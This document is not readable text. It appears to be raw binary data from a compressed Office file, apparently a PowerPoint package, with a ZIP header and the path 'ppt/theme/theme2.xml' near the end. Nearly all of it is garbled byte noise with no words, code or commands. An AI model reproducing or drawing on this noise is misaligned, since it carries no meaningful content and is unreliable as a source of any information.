../.....%%.`.(.N......@ .-".%rq .P.....".....t....7*`%.D.l .N.I."..I....}...s.....Th.u.}F..K..;....$..P(.-nd..K...n...A*R_...0.B.D.7.f.8. YR.=@FF...%;.B.....d.:(.I.....6K..!Ke..%.CV.D.3:E......I...lj.0....sJ.~TEk.3]..X...:X[*......8.....rpk.xs...coI:..rT...]..z........b-.5;bl.5[.:[9.!*...X2...H.T..P.h.2J..lF.'R...|.._..L.o'...k@...6.........f.@@>.D |......l.r...[.j..o    %.......Vm<S.t9..1....lPd\....4..3dTL7.*C..X..K.._.Qic..3S....0..$.....>6;p.k.=+......A.k...q....;;9.w..)q....D.6.(...d.....[.....-..Ccv4..2..VY.b..U..wj..h.v.c0.>...U1.b.    i.a..)f.9.....)...-.=t~......B_bh.X......&.....z.b.7x.-.......+.....6..#.....a.U.6<.........r....a..2e..b......Yk    W....v..l..*..T...V.H..B.)I<...........lq...7.0EP....%.F..3{...........a3*.....k.K......d....<P    <`%P..t..fi.pu...V....bhe.....)...
y56.e.hX.e..~t........e\...M*....W....H*....z.....0..>}.e........!...F.Z...r.y..5KG..L.....x...f.        ..<.:p.....]...v,...v..~k..v*...v..~[..v,...*k\...S.z.n.L<UW..f.^.)..Y....+..Ue.'.V..)_e.........Zm.....{l.$..."../..V.d[Z..l.k.O<../.......J+.B...
I......H...Vp..Z..    ||.a8.k6;...    8n5GZ..u.....W...0ld.S..p.H....?.....h..f..&.....+.B.......D...O9...O<Q............z,......J.O,.......W.k8. ...l.K.....d.+=.....^-N.....9H.."YR..r.J.a...B,......pSnc......c..(Z}Kk...Zz{.#c%..Y.xzN.
....N.)[    .(US..Tjx..(....1.h.ME'..^.%    ....RI.......(A*[X..ab...v.
.~w.y..n.OFS%.{..7....c.T$s...=....$..&..._...P....f..IU..?..5.....E........U.^.&FV..D.A=?i....bP@h.Uy...Pn..s..T.....j..x....s.,..E......`.~"....-..u?...Jvt....j..z_.....lE.,.....,.Ax~".e.Z#....z`.=./}.K...;.1.,=>[.G.    ... .v.[z.yT.d..S.2m.......28.....1.s.a.......T<E.
.0:..(..D[.w...u6..T."..Q.\.    O........D..@..s'U......@0.......B ....4U..B...R.._|=.\x..CJQ...N.7.\..<...2l....V..;/.Z.[.6.....-{t.m..............2p.................J/    .jrF....t..[..^5.|......d...R.Z    q.X..m..W.[!n.......h...Z...I.....z..D..&%..+....I...>.....|.s...............R....n.....[..o...{(U@....-....=.G(..ye9..p.q...:q..    c".
.O...q...h[.x..z.[ .....Oi..J...7.H.....f.mG9.!.[..x.*.[..~..XRy.I..Yp..U..Yp.S....'.n.......E.c.p...!na.R=..R...Dj..=..[tY.>f.q.)....8.sn....L.J.l./..K[t..2...b.[....Z{K..>....`...0<..\..5..u..0.......0.r..~x..L..$<........b.................-.....RR.E.@..xa..C.~..K...1...Wf.xh.h....U.....M9..~K..A4..n.Czb.X....q".c|.-\\....iDn.Z1,.:3....%...4......9^=S.r.H!.0ca.(.4...^.....,..i.H.z...+rk.FV..R....-.S...$....8....K.J.Z.. ..O../..X....?....3....Cq....+...Y.FpK...D....m.[B.g..[9....i.....J... .s_.L........!n    =.......@q...    **.....[Z....v!......Kp....x...#.90...,..DT...f..e..-..RJ/..0+=..-.c.L.e.-...4.j.V..n    NG..,=a..le...dt..I..eq.."..j    w..Z.-&..A0.......TCY.b......S.br3.Uo.&.,vR..\.B`........s.../.5Q{.........#."...U.^....-.....`V..b$.bN.U...j...]lF$...I6.0v0`.n..;F...u..2\..k.k^.]B.b9J.J.ekU.U..-m.".....*>69.D..(.U'1.......l@...8....Cw..d2N.z.A........2T.....Z.B..{w.-9......."x......JG*g.h<;.x.,n.k....ht...pk.r.e&.( ..]!{..T... S/.!n1F...%3..].e...n1~a...u.....q;...A/&.s."p{fo..<.V..].)....._........&./...%..xA....-V..*.P.......E%j...p....x....0c..._..s........_......I..............G.}..>k...gD.%..-.S....W2.'J.....bT.v.()n!-..K..x,.c..c}u.I..J.&.,...+._...Y..T.....i..-..'.....gh`[Iq.H..hR.......<p.pQ....".DR..Pz..b,nu....&L.aWa=9..W.o.....Ib.Dq.B.!.9$..".....[....8e.T...R......nm.....H.......E=...Sz.?.....`.
N."..S...b8.[..n....B..0..N.
N.4k^.,....
.C.T...[.`.......3.......;..f.HS...a6.A...+.$..3.!.n...Cd.[4.......f....bL..DgE<........&.i...?.....'R.=;F[...zLF....btE
%.D&F ...%..bJ.["...gN>.CJf2.-.X..T.K.....$4..$......[.........b~.....^._(.;hJ.. .X..8.......x.%...Qd~.,.....9b.%S..M.....j.a`    1.v..F....Z.....${...o.cD./..Z.g|mY.....4<F6.0..y    ....8.M    ....\..J....K.kLSu...oi<K2..Bb0p%o.[2....Pb3..#/I.~b8..FV-..L..K.B...4......g...}K.....R..R
......*..........Ie....H    .c@LL4D...V..t....h.3 .c@.....8.....3w.3....0........Y.~......;.......N.N..........Ww.f.h......9.....w....F.u..o$..9....S.t.I.H.#........,`......k.-GY.@...U|E.....h...ox...&.T@g\.,Cb.qK/[c4ZB.j.....TCX(.A..z...".V..y...Ut*.........o..k.H.......^@.5.[....
...W.V..P.B...:..R.C...... ..|@%...T..c.'.....5.
XR:E.&`<[/._....by..k+.".E.*c...|'..iB..
..O.z.qe../.aF.Q...u...7h).Lxgpk..c..._C.2 .P)....2.....t..|.N....oh.:...>.....`}.f..
...BVOu...M.nX+...d....[&....n.V+...>......V..=.Lv......Z.d\Y.....C.3.....x..)...:.CU
[c    O...zR......~.-fb..e...y...iw..... ..Y......_q.l.....5.a%..i.{d=...xFj.7..o..7.8j5$0$.........e    .    .C....!..cH`H`7%0pk7.=.....X...n.C......Vp.W.}u.0.Rd.g.....r    .
DxX.w.....!..\...X.m..../...B.!qa.-./B..d\F.0.>......."9.y.dbj{.5a.Uu..>zX{..V>."m,Iu.s................l....<....n.]..........s...c.x._,....-[8[U.nA214..k.4F.v$.V.2
.2d.Sx.hOH.G*j3[....P5._%.ue[.$|D.....*..$1...i...?c.p..8.A.^v...5.../..j.n...,m...m......[..j.. .%...-.T.E.g...$.r.dWt...o-.W3h|[.Z..y;K...K........N-.8...*1Utq...'>...~..eW..M...."...U|O.O.-.......Y...$~....zW..o.8.O....2....6..].......\......?n....3Y........[.y>......../.=..9.PM......S*>..a.;...<..bZO.|....&.|&..~._.0.......->.l.Ov/..L'..j.$n)..:.....D&....`<.c|k%U....-N.y.j.Vt~l............an.|........S.S......
...T(....~W.-....>..<"|..K...R.%....a....k..C...).U.....y>....K..&U .O....-Ap.Z.o...7R..iu....    ....k....!f...,%.4....~.7...fw..oq...R.y..-..X..W.A....(n..    ].....z..n...N)b....,.[....T.:...ek.e....m.....-#&.......tw...+........R.PS.K......q..].)O)%..,.....M.h7.^H1........
.iyJ.....`kS.s.nq...Y...
.d.j..K`.qKGE.r...s.o.c....R_....=.d...K....X~.[..........O...A..zS....*./.i.......5.G....y.tHN.[."..Go..........2......@.@F..V.-j(z*ly.s..2..mK..'.R.r... .(I.9d..
..j&z>.8.->.iI.7o
.tPTO....m.O.[..n.6uJFn..z(..:.3...(.F.Ew..)..!.r.-.c.&...oMn.C).T...3.3..E.R..-d..*.U......=.[....S...e..`...qKv....n.d........n...Ve_}.X...rw(.e.....d.....*(..[.......s_.C.;.[EI...Kx.[".....7.[.*....*u..(....G.3..1    ...g..O~..)u    n......#@0..*W..0z....+.88.5..*.......2.)....`....C$.......:}K....7<..0.nU..............@u...,.V..k.......@..k...Lq.=;8z&.j........o...+....
Hc.O......n
.._.(..iM.....L..i<.2.E..Vq....    ^.V.*n[.-Ue.W............u....I`...ww....Z.F.....6..7.-Y.~.W./..y.g.........>G.:.....[..+z...9./_.3.U...f...i'
..[8.].....W=.-.u.X&
.D.....H.p.............G.C.!....m...!.I....e.0A$..Lq.X..n/..v...&.z.I.....e......9&....v*...-........2Gf".C.&..P.gU.n12..........7...0i(.l..yk.[.w......K....O.=......EK..U..[|...-.........".o..o...^1iu.......sL...I..O....cR[tp....$.......JL5.~[}.bxxg...h...zd..q..Up...Py..)n../[w9Z.n.4!.--..[f5....F.q"=.L..Tv.....d.[.v....^..[....w..<.....VU........ps.O3......V.X..g.[ -.'V.+...Z...+1..*......[....b.-...".;.a.E.NV.+...Z...o..Y.[....
na5=?..7.[X.:..-6.[Ut...R.S.jS.a........Z...l.nI.u.lf..].*6.-..k....](...-.'o.......3...q..S..@V>..-o1ws...%o0I.;DMH... ......*..M..t..#..0.a.8...C.........7N_)iE.r.k..\X..........#...=.gw:N.v.~..[5....za.Y<.:n....W).9:.ok.n1w.7./z..:.U...$..J2..`.......!.......`.X.%..7%.U.-.....v]]e.,n9.....D@..tqc.U.l.....j5...!g.j.Ig2Y.[...k.8...<..n.b.`...T..a.......0.rk..Z..vi..........z....g.x.,...k.X.~..a.w.......n..k;....x,v..Y....(CW....b.W.&%.._..6...K*.:..iS.a......Y.bI.....L.d,+y..../..}(v..z..h.TK...m..........1L.C...NE..[>.g.uV%..6B.v..bs....V...>..&....v..........JL.;.\..@=aV..,..p    .3A.@..[
zEZ....L...&. ..04.X.>..u..).QBG.2.u.F.*...j..J`.....e..]~..n.O.[.Y.6.r`......!...6....V..N.|]+...+v.;t..].P)........N.....r2.qY#......HW6...d.Gof........[.#......e..*.T.......e.6C.;I.]F.Y.]..y.^............-.[U...F..6\mwuo.V{*/_.fTO.m......S.;]..[.......k...............V.:?}.....|-=..q.Y.    Ox........N.m............w..X!....j2......3dg0......>n...8..-<..CkV.j.16..>M.....{j....=Kl{=).../..[D.U..(.k...b.3...d0j;$0$..$0pk=.Q.!.!.....[.-.....o.8...I.-....`.o.l.wH..K.p........`6....`.H`.J.....WvZ._f}X].M....o.......8..e........6....e.\...#4$..$p.qk...........`..    .    .Y    ....5..$W{....B.$.x..x.7W..nE.c..Vf
[..J...,W.....Bh....E_...    nY.(.].....k.8.&|...ZJ.....es\el.vR....|7.L.0.'.}w....E #O8q.a.\....O+K..V."......T...7.*z....I.e.>,...9.D.....n..w.M.:.......LwEs5..
..7E;..KmO...c.c.......[.......;!.....,.&.P..6..,.Kn.$..V.j..<9+....P..............<.(..2r>c..2    9..+...|..%b.~.......g..    ...#W.PE..QC,......0yaO.....K*.Q.......VJ..D9...Q(#GYE .w...,.."...3T.....=?Q.pP............S.Nc...*G_.E..T.Ah..xFA5..=2...B.m0.."o..\..p.....Ly...]..A.V.....M4..W...*.D...f..k..Zq+..S.'=.I...>h...b#.....3.9d.............j...;.....*.w    ..n.O..<..h...p.[...UF[}...w.k(..yX[....[n    Z.....).Uz.D...4.....V.?.d....f.>.[PG5.,....$.z.....\8..!..%&..?......\...N+.x.X.;.."m.V.zXNCW.g`E._..9.rk#u..L$T....(...I$Wa`8..<..UJ8m.....v...*OqKj....t.%..<o_.V.....
.-nU.!..qK..3.s1.2..*z....-.2.[#nU3..y'p.......)n..g..T.......j..(.=.[. N../4...z.CU.....2.._"^.8o.o.L......].5N\.[F.ru.y..7}&p.[...!..;}..o}++Ket H.d....-.......Z.....9.P......1.g.RYej...[..rK.:.......o.o....\...;.?......1....4.....9...W`..rZ.i.....U.q...Q.:.........T..v.-u...>......Vnx..2}Kv..}.ph*0/f7ND...j.|...^..%.4.I.[:TI.....{M...@......R...!.M.q...<.y.6.n......,.O
V{.`.}.R..M..X.....P..m.[..s1*{...?..].aC.y.}....9Q..U....l.e..+T..B.r.........uF.w..q"..[..N..n]tQ.8..Rb..E....l....Up...G...r.....%...L...hl..V.......5.?.r]....S
.Wp.*=.q..B..e.RW..U..92.8...$.H`..e..zN.{........s..S..v....j......n.....lz.s..M\.o..wE.;...}&.6.-.F+b42.k...qK.3.jP.].......#..3.}.r...uv."J.b..X
....C.."K...3G..Aw+;.[lT.YE.C{..:].sc[.|Hm'.L#..\:.D........7}.7!.kV..[..X..-.hjw..9: .........]e..>C...m.b..[...V...../...    .U........{y.0e......r+.......%.n..].7#Y.Ni4.\....e4r,D4....??....fU....'..W.....:.51gO
C...v,..D&.im...^L.......,.m.`    ..[.F.8.$...}B...e.H..x.K^...p..1.!)..m...L........F.........R...B.dW..... .<.*@.4"... m*...).4]...U..h...    ..O......_...)..yN.J...        ......;z.uYQ.U...T.3...6uu..\...3......r......qb..{.Q..f.-&..l.D...|..e.B.$...$......;.-.Y.Q4.p....Ea-....O..@Z.8$,......[t.s.=WR.dW....-....Mu E..._.=L.;..K.o%U..N.V.:=...`!.......A...9..    .I...........e....v.z5Ey:...+WI^j3km..=.g.c.....^%.AD.bn^..R....'.R.St.}.6.........S....j'l$[...-....3..4E.....J...>.?V..2v.....6f.+@y2.(..q."U.H...g..3.W|.Z..j..H.o....+.........
S7.:}[..I.s...kR...&I.....-:....b.....a.d...F....2.;*.............mA0.w.J....R.......5...U.b.i....*...:..~..A.....zD...H...k...|...j..*R.5..[....Yr3rlR..4.......1c.m1.Rf..........:.,.5o.......F..H`........>......]..z.H..vZ~..3.^vlYqfh.`.....A4=.m.E.S    .7...b......X...n.Q........H`....y.2$0$.F    ..Z.0..!.!.]....]..N.b..H;].A.o.....Y.......... .h/.e..^~:+......j...9.;a........~q.o...U_.U+.......%...yK?p..........&nM...+."nQ.lP...[7[.A.    ...(.s`..f..6q.f.....<...9g...A...,6.oH<..J`......Cru.Xl.MR.r....b...v.....v...w......8x.....M....y....0..VR.b&5...Z...U;.+)...T:.._.9..xr...v<. c
...;I.....y.k.X............].R..i}=h{..R...p.a~{.m.....bh..s.Z.]......YHlX'......b.W...+..s.9'.]..s>s...f..0.vd^.p....-.s!..../o.R...7...Ly.+^..,.+..*....0>...."h....^Y8;BF..:..:.V......$r.,.&@.{.$.^.....Cy.y>.:=....N..j.w.:P..l...o.F.GU.~....2...9../y.8......r...0.....|
..q..R...L......    .../.}C....q..#.O.u..o.3.b..qJS...*....'..,......O..|........... .*.CZ...k...i........#......N=V.....@L.I..........h4'f......@4........F....&.....zd.'.....j>weI.}.sb..p.4....n+|8.#.7...<.....c...9s*.uE...L.|..Mur...Zqkz...t..5=..+.e....Sj7.t~l:..C.}D.9d...nW.-..yXmyB.8.....M..-z...'....~..}]qX..0..M......s.0ou.......-....!...n....!n..N...-/F.9...E..    ..1Z...!_..@op....u...;e....7.A1q...].>r..zjzR..}...3.l`..5p+.l.S.rr.1W.l.........*.)mC.R4..<.N.....W..Wn...c...'-g..E......:n..D.1..<.#fz.Ow~.......
V.j....vp..ZY94$/O.p...M.XT.a..KS_/nQ.1.j.:,.l..4.....b.[..I.3..Z$.)n.T..y...r9.J..tZ.......HvC..[>.6(C.`.p...Q......7.......9y.......;.mf.z.o).X..
Lq..S......    .|4p...+}....&....n..Z..U......J"L.Q+.?..5..%QX.@...?...R..^..[}....=wq.g.+~.W..*c... ...d..6Gx.o.ru..e...91..uN.}..V...V+jK.[.s1......Tk...zi.xdS}....g..Y.[Fmm.
.[.S=...1..C.ym.o......zK.9..Q..X.3......;<N.Z....L.....4w...Os.3...q....}.U..
......,n.5....T4...[m5.....y.m..q.(.K.6.6.Je..Y&.)n.e    ;.5...[....x.....V..f.............[...q....-...Oq...&.S..[.o.:.T`....y+.~*...<.[....!6.K.....[...j{.....q..[.M..........-......U7N......U.......R.5]U.C....U2..>+...Y^C..y..oU.9.........H*... ...C5.E....uq.O.[..}.-.....(......[.......(...o..p.t..Ms..)"...
w.@.....L.e..n
..@:.O}.S.n.........2...S.sr0.U..    2.x.Z.r...........9|.y..Z.....+(..TEl"... .,.^C... .2..........q.0.]...._...+P...x.....n....}.8...k.XF..m...p.....p..... .b.-}..e4j..;
.9dO|..U5...0..m.*...X
;....V...v......:K.3..}...U.{d...pK....{.V........@...Q...W..RU...g<EJ}....9.W.M.......c..........o..1...y[.......V=..w...:*':.I...>.1.-ru.%..-.D.A.    ..[(..|.LqKM.$...0m.A{..*.%K..    n.[]i;7>.-y].bh....V.Td.[S..S..=.D..-.7....'....=..~-.Um..).-........-q...0......$9.1..[....#&.'V..V.R....6.[..p:..LqK..Q+....n..q..7p...caxc..7......Y.@...9.N......bbI.L.....q.V...;..-SO.*.M.p.@..[l?u*...1...(.i8.)ab...o..e/3.C.mm..0T@oh....b.mUC...gM.E_...@..by.....-..pcH..a...Q....n....-..)&.za.IE.E6...v.hN.oi..{.0...pN.2.oz.R..ZV..S...Y.(.......0.ID.......x......2...;.E........a..    )N..........p`..\^.,.eaW..:...DMG.g.T..l...uGg....GE...4...9........-....Ec .3.......$E........./....k.Q.....t'..1.&....&...In=.p..(..'.w.f.....g.D..;.#...`_l........H......6.E..gzU...H%Z...V..C...ZT.g.......n.......]C.:A..0.26q[L.&...u./....91`..^4.G.-a......R.7....`...{^E..`.HDp...Lv.%.UJT^.,..4..{.f..sM&&#PiK.Q3.m..!6..C.......p.]...J...a<C.G.W..6.l&..[...!VUI.I.V4.z."3.ZI.}..#...."..aX...v..S.V.....0..]..v......m...{:Q(..b..-..N..c-.8"....5.........2pk;...y....v.......^...'.^..Q....+.lr.*@.R.To.G...Gv.....#..a)=...&.:....j.}k;.......3.......qW.>....;tk.A.+........f..n..g.$.....g.j.\.EZg.2{.t^B<#..x..@8...+...V....o.l3...A.....GM.....%..[....3$0$.[....[....    .    .K....%...U..k...C....Z.....PKd4~5    ..ZMN..z...4]..)....:..Ny..eJ.|.....6nG....#.%y.n-...EO....3p..d4n.H`....l'z..*....uN&...-.9.d.&..pJ`..e.T\..8.+.{*kn..bF.gm]..........).[.n.V...z....L.,)K.E.w..\.SL.@.s.."......    T...n...z.m%U.8*.~.J......E.K.[.u...!r.jJ)..Y}%.#.Be.......g.@.......J.E.=GZ....I..4..-.|+.z.Z.m.+..;U......w.i...m..5.Y.....:}...ZU.Y.-]...I.@..:...]+nM}.mx..c..O..}..]........%.3.P.o!...o...qN..<4....+.<.w.u...-..ID...A8....rs.T._.[3.M.y......v.......eF.s....DR+..|:J.....\..3~._...r.T..IQP.3...CL|.....E<..h.^....Z...r...Hr..(..oql.>>)Z?.^3.......Q...?cK...O..y>u"B.    .L......I=...i..<...)c{.F....S..7R....$    pZQI..R.%8....-.j.....=.V...X3../P.|]\6...H>..q.$n.<(".nq.b.o.r.#.s....NH*.jE...)&o..    t..GG...p.tEL.NI..I....iO{Z..mwn+..).}+..1.[...h.......9.j...X4.v..k....U.X...w.[4'.3..h....j...4U..bZ.ie.Y....6}Q....'.o.^E;..;7.Y.ET*ybE.gA...nQj}.i..h.y.*b....I.@}.{g....V.%.O..r4..V....).N.:.?]y:m...~.>..V..p    '.#1.[<...L4.....^../..Rs.X...p.*.........{....*@....[p..O~r.z.e..oE.2rQt.4c.s..|..C|8X.p~.7.+.m`..x...(R....C..A........K.....b...+......np.....*....^Z...qO.J.,?m...?g?..?(.w..pR.=5..bEV.i...-.n.    <LH....`s .1    Oi....n...^U^..T'......IV..............e.Q.~.U/}u....K^..U..'F....y.......-I.8.......+..}..V...n.[].)n!.8......8q.[]....b.._..S?...U.Auya..-..v..MbwpK.<.*1^[..{..v...-...<.-.3..q..S@.Os.[..~#-nU..o....n.}~..n..(..K~....#..J..N....2....c...a.|......mXZE......f.w..%V...Z..m..-6........-]...q4<.........j./.*.]....$.!.-.b...]..]......)'..O...VU......B..K.l....*u...<.&cp...d@.$Z/752...gp...X...jL)]..l.._..d%Y..34...._.[h.0....[E...;.z.........R=...qK...H...#.(UT1..8.....V........'..*.......=...w.
..y
.......L..c...oi.WF.t6S...s16.[..f|.K......-n.T:...,U.(.....=..p.[..[....s+.<n!(.|.p1.CU........+..x&.g$\...h.. p.Tb"w.....:.eR.?...s1.x!nI.u2.k.....-...H}..T.'"..d.gp...#..M.wa.=...Y?...C.........S....d.pK..
Y.)?.b$W....QsW[.-...
W/..I.....t......5.0.....m|...X.....J..T`..D.......J.|.o
.Z.Vq.}~wp..oU..U..2..c?.c.:.;p.|2N...n....s{..T.{..r.h......|..7..g$........3[.    G..E.6..U.zU....+(.r.`..!.h......K.,...'*.......V.-g..}X....M...'.E....^&C....N.....-E.}0.).deg.....@r.....6.OqK..>K    V....2..D.e.R.T..dk./5...A.=.hW...Nt.i+.,.P.bkf..,.....L.o..T..B.,vC.b.'..A`.V[19....zQ1..2.8..o.]F..j.}WU..oy..U...E.S.2[.iw..z..........E..nU.....b...Q[9....4.;.T.-.YQ7.[U.1.y.."./g...':N...2.@&v...#eb!.......@..;e...p.(.h#n.....6.UMs...h1.:......=E...".-.../?.'.de.....s.....8.<.....A....T.V..Zp.Q.n.[...}...y}.;..;u...(d.....XQI...:...+....p0h-z.u...W...Z.=V).R....yv2:5....Tu...,f0.|b...s....;H.l'..1...Z...g.....}%...U;.X.&..x.`.
.:..t9_..%i..}..t9..b....gm...........n./M.Y.S.......kJ.u"E3......^....w.Xe.
..<n.}..ye.E..w.[.[,.E    .SD.|"....F......r...q.}..Ee..mFa.w*.~3....m...{.....WI.............;.4.J.bhk..0d.LA.m)I=..N.cj....6..O......H....P+...ZG.......*.4y1e....Rt.....R....+.'.F...U4.#..CYr..&_BP....K#M.v.K.....[!.........w............h3%.A..7..V.......AZ.Mr..):..d..tA....N.-..N
.VK".z[Z....@7N,..........5...C{d...):o.G....A..eG..z.U4..,.P.y[Z.IJ.E?}QU..P...    .I2..G.oDM.sZ.#/=.b.w*p.7..G.R.H`.......y~s....:u.....M5....LO^Q.9.zS...V..lO......v...!*    xV..a.v........,....f...i.-.W.3B_H./"..[...:..q.sV~.7=..t.n.".y.}.[......t...........g0..$..(.......UW]..2..~oQ....*nY....>.F..Ka..L..@Va...    .nrs...[.b._F...m..+..Q........&...b.u.a.,YG*...6~.0+..........g.U2.>.yr....N.....[.,UR1&."6/fe.*..rd4..
..il.P\k.....B..UdVp..7.e..Z.?.%ZX[3.Z..........'..v...    .    ._    .....n.|H..J`..a}...C..W.k.-S..oH`H..K`W.pM.....K.....oH`H.0K.o?{.......p;$0$.&    ..Z. .s.7.>$.....5pkH`H`.I`..~{b...........n......o..........F...vY.......[o....w..wl(.[...".....c...;.g........,]....]...tEG........._...........ZVw....h......F.......~.g..q..%p.'.{.G.Y'....9.^.WI...o..h.....s._U.../.....t..../.8,.........y)..:...k?......|../.......'....]...~......T..}.o.w2....Ynz...4p..W.......%...OU.u.....=y^%}....\..M.3Wt.|...Nf9q.n...g../.}."..J_4..._K..=...g/.............:......w...MW....n....w.%.~....Q_:q..c..I...o.......?S.G..|.W.{...../....>.|_..1.. .6.(.........7<p......K?....*.pk....V...|V....V2.......o~..&uY..[O. ]....n=|.%.
../.r.._..g.....>.}...u.../..1.....]....[.&..5.'.s7f...U...9v......|Y..1..\qQE.....}...2.Y..].~...~...+n....>x.G...^.t_.2....~.%...o~]}.3.u.]..e....q.Z.../*.x...N....5........*....~....>..{4(.....e\..[..j...:........{...:....wU..<.......w.;>../..g.{.o...n........~...>..J........6.H..{..?.[?...!....../.w......m...v.k.}......x....d....[._...\....DT.?.*...*...??!n]..g..<...,{\..[.]....\.....V...n......}.G.|U=..:_..s+......]X....b..v...z....?(.y.*.+...O...O;%...........{?t~.........nu<..._Vq.....[....m.V}........JR.J........C.[.../^..g.k.XG..O|..K3yZI....Pu.(.b
...G....>..q...nf./.b...}.....Q...PyM;...C.o=z....._......W..-....N..{.V+......f....x..O_.*f..........>...'.j......O.?XU......y......m..81v.......?..[..r0"7.[..62m.....4..w}....*.[g.e...Y..:4.e...../>.h../.../..zM.....Y.....&t...|.=Xw]r..w.Z...ROj9....%.=z......
.^........D.=. .nm..l.o....C5N..e......K-.]....._.?.{...&....#>.-.....?T....j0,U.e...-.....4.-.~;.b.{...'..[....,p....D.4.......[.....o..}+......H."..u....4...V..^~.}..../....rM.X....x..:..U....)2e...../l..r...).Z....X.q..F.0..-.......Gn;.j8o..o.....?........Om'._.e.9V.....e]|..7..k_..+~..H..u...(....]k. ...k.|...@.............-...._......?..J...N.......I.l.q..^+........}+.u._..qkq0nU.u..A)^.e..M...y}...J...O.i....9........e../..s......=.....g.....7w....\+...x.<..)Q<..z3.....}g.......[.e.7d...`.Hf..........gW...._I........._....O-.n-......W..n.d\.nM..t..v...pF.....[..$.@....['>q........u.r.......8r..8.#..#......+?....%....o./..\w..7*......nb....T.7..^.....(./.{...&.-.X......)....{.'V...n.....q.'.S.XV....n...e.X.}h.@wd..u.-...-._.,..),.."o;..*c...#;y{.XQ^.K/^...`...._..[.8..    ..........k.;..zl..2 ...[.J.F`H`H..I`..F..a{#F{......n......o..........G..vZ....}......!.!..)..?....2.'.+.b-|.....>...7$0$p.%p...^..l.dM..a9.`H`H`H`].....I.>C.C..%..[.%.Q......$0pk]..|....vK...vK...!.!.uI`...$9..    .    ....n...G9C.C......uIr......-    ...-I.r.....%..[....3$0$.[....[....    .    .K....%..gH`H...s..m.Q.......B.C.... .W.r.B.B)..hE/Ji.j."h    ..(T-.-=P.8..7Gc'.s.i.....7.0....z=...[.V......l....K."@...4.!..0E..e.$...    xE....i.C.$`..u..I.!.....u.+....H.....)..C.$.....W.9.    ..)..-S$...H.+..-.Hs.. .S..[.H2.    ..W..[^..<$@...P.L.d.. ...P..".yH..L..n.".<$@.^..nyE....    ."@.2E.yH..."@...4.!..0E......l-..45OY.i...).$@.....RQ.o......MGvS.tT......'...B.$.......N..l.n....C.....k..I.....n9g.8......I.....j9.8.....:..-.6....G7    ."@..E....n...j.....x8..)...N....0.w.[.fc..(;...".r.V..2%    ,..P.....;.h..!u.s.    1&..,.&".b..D.YA'...}vrL.S=A....b..yKg`..x........`..P...3.....J.G.3c....}...67.p.H....]..GGm..NMI<."l..gzh([....T....B..A.'.........d....T..).....=....w.\.V.=.^/.[_....4.|\.r.....}.F.#..b.....$.]b.{..y.Kw..;.|,a.8........V........qnf...U../K....Qo......vMw..{....wFZZ$.i...i....0..~.Q.......jj.c..#.._.>../......R.A.?[r.I _...[...-/...7......h.}kk_....../......24........\........./6.x...g..o...ti..]Z..B..nAW.?.....k.[......x."......n5n.......i.............k......C..Q....K..    ..n\....H...........'...-,N%I...%.TO.m.kh.....0...oy.......D"=sb`..7m....XvA.n.....`P.-......`.[x.k..Q...Y|.t+.m.J.N..]..}'.\.2Xt.........7...[.'....X.\3.9..n!...........g..>.@.E.-.".:.F.$.e.H.J...."P~.U.....g..9...N...n5}.E`.vKk...x......Z}F<-...-......./.PY....[f..M'P~.U..CXf..m_!+.[;.....w.[x..m..u.....j.............p.x...C....n!.D4.g...u....fpB..tK.o.....[r. Q.X.o.T....e).n....w.h...\'.3..H..C...~...Ii+.[.... .........`.. .........."}_...[.UU..|.m_>v.........?..$..T...~...H..,.uc.j..z..}y.....X..j..r..&i.=.Ztk<......P....
.m.........R...w..ut.b....<...v.............B.+24.{....$.....^.;.@......2......~.]..:R,....[.*-*<QG.0...N...<]..p.}..x{..E..n...I$^.....%V8%..U`....L.[b..C.....d..FE..3\X6.4z~.]b`...'S...    .$...e..t...(..Qw..pT...Y%Uw....>..ffd....*Nu.......$.R...Uw
A.G...o!@..JN,Ee....$.r.Xw*.....P)...3.x3...g..."P..57=5..\l.K~K...#.....b...t*..M.x..o....`x^........Nt+.L......[...;;..P.{.R.2
.2_Z*.....M[...*..A9..[..~...].(.@..VA......[.e....E?.nY..?......>^..}..$...u..7.Qnt....B.=.:....D}N.u....._~...}..e....    P.
..i....4...TWgJi.y.[..s}.n."DA.<.-..?{.sF...p\..w.....q.[.[. 9.pl...../....P'...3...r.bdfN....u.|x....A.+%.B.P.
..e,u+...I.......K.P......0M..e.(.Q....)I`..uk....u..J&".L.lu..bM..).|    ....k.+.n.H......[c.....l.    ......S..    d".E.2..F.$@.%A..U...'A.$....V...J.$P...[%q.x.$@.y.....b..?.......PK..........!.t.H.`...2.......ppt/theme/theme2.xml.YOo.5..#......?M.F.T....6m............lo.......(...7....J\..    .A...x.gv..,I...t#eg........z.A..!....../..D...h...;..K...
.#.xJ.........\..*&    A.>.....Je.++2.a,/...07.".
^E.2....&l.Q...$...Jq.do..4$h.I.......TI=.2...I...F....".v.@.......+.WW.F.`...1....F..i....2n........!._.......9....2.&|Z-...o.d.t.D.>^).=.9 ..Z.w.z...'..Y.Z    ..6..[...bF.I    ].......1g...V....._......,.<U^.....\..s.......)R...q.............;......d(h......8_.{...W...W...?|v....G....`iy.wq..._~..._}.~.....W..........j.r./.x...'/....o.W.......M.D...:.    .f..KN..|+.1....4.8..K....=...f...M|....*Y.....'p?.S.....F.x.=..6..V..y9..L...........xwp...7.. .*...xb.3.*...(.....
3........|..=..1.4....hZ,..    .eV% .....]..Y..]r.#!+0..~@.g..x.pREr.....&Vq.....]\O*.tD.G....j.m..:N......{l..H.....M.....I'.IV...4v...    .(F.\U....!........K........y"-.D.L..%Tk..'4}[..\....L...ux..d..p1.......t.@..w....m....wY>.....,._.........nyL....#7.i.%l..........OcY..y..p..f.\}HU..q..v.....IG.e\....W..L.aW.....2..H.....7.C....v"s.,.55..2k..f..V..f.U...L..T...>,...skB'...+..    \......H..n..[4...B\$c<"....e.....X1g}..
......j...&.....$...%.
